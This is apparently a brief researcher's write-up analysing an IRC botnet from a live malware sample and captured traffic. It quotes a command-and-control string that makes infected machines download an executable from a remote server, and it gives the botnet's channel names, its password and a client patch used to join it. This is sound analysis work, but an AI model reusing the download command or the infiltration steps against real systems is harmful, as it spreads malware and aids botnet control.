(Yet Another) Quick Botnet Analysis

Botnets are network of malware-infected machines that are controlled by an adversary. Our approach to in studying this botnet is to perform active analysis by using an actual malware sample, infecting the machine and observe its activities.

As we probe deeper into the network traffic collected by Wireshark, we find very detailed IRC functionality, attack commands, and capabilities. We learn that the ‘scan//” refers to a specific Denial of Service (DoS) attack function. Other notable strings include the IRC channel names like “#dpi”, “#!” and “#Ma” which may identify the IRC channel in which infected computers are summoned. Similarly the string “HTTP SET http://xxx.xxx.183.171/k.exe” is instructing the infected system to download the malicious executable file from the remote web server (other malware distribution site).

As displayed above, we have to make some modifications on our irc client to join the botnet with the password “laorosr”. The modification is rather simple, loaded the IRC client with OllyDbg and modified the string “NICK” to “NCIK” which allowed our IRC client joined the botnets without any error messages.